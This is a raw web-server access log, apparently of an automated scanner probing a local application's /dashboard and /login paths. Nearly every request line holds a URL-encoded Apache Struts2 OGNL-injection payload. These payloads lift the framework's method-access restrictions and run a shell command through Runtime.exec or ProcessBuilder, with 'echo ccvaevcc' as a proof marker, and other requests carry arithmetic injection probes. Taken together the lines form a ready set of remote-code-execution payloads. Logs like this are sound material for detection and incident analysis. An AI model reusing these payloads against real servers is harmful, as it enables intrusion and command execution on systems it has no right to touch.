127.0.0.1 - - [16/Jan/2024:03:53:03 -0500] "GET /dashboard&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:03 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:04 -0500] "GET /dashboard%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:04 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:04 -0500] "GET /dashboard%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:04 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:05 -0500] "GET /dashboard?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:05 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:05 -0500] "GET /dashboard?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:06 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:06 -0500] "GET /dashboard/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:06 -0500] "GET /dashboard/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:07 -0500] "GET /dashboard?redirect%3A%24%7B6646398%2B8571002%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:07 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:07 -0500] "GET /dashboard?redirect%3A%24%7B6646398%2B8571002%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:07 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:08 -0500] "GET /dashboard?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:08 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:08 -0500] "GET /dashboard?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:08 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:09 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:09 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:10 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:10 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:10 -0500] "GET /dashboard?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:10 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:11 -0500] "GET /dashboard?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:11 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:11 -0500] "GET /dashboard/%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:11 -0500] "GET /dashboard/%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:12 -0500] "GET /dashboard/(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:12 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:12 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:13 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:13 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:13 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:14 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:14 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:14 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:14 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:15 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:15 -0500] "GET /dashboard?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:15 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:15 -0500] "GET /dashboard/$%7B2279061+6257479%7D/index.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:16 -0500] "GET /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:16 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:18 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:18 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:18 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:18 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:19 -0500] "GET /login?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:19 -0500] "GET /login?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:19 -0500] "GET /login?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:20 -0500] "GET /login?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:20 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:20 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:21 -0500] "GET /login/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:21 -0500] "GET /login/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:21 -0500] "GET /login&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:22 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:22 -0500] "GET /login&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:22 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:22 -0500] "GET /login%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:23 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:23 -0500] "GET /login%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:23 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:24 -0500] "GET /login?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:24 -0500] "GET /login?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:24 -0500] "GET /login/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:25 -0500] "GET /login/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:25 -0500] "GET /login?redirect%3A%24%7B4769431%2B2095004%7D HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:25 -0500] "GET /login?redirect%3A%24%7B4769431%2B2095004%7D HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:26 -0500] "GET /login?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:27 -0500] "GET /login?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:27 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:27 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:28 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:28 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:28 -0500] "GET /login?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:29 -0500] "GET /login?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:29 -0500] "GET /login/%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:29 -0500] "GET /login/%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:30 -0500] "GET /login/(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:30 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:30 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:31 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:31 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:31 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:31 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:32 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:32 -0500] "GET /login?error=true HTTP/1.1" 200 4296
127.0.0.1 - - [16/Jan/2024:03:53:32 -0500] "POST /login HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:32 -0500] "GET /login?error=true HTTP/1.1" 200 4296
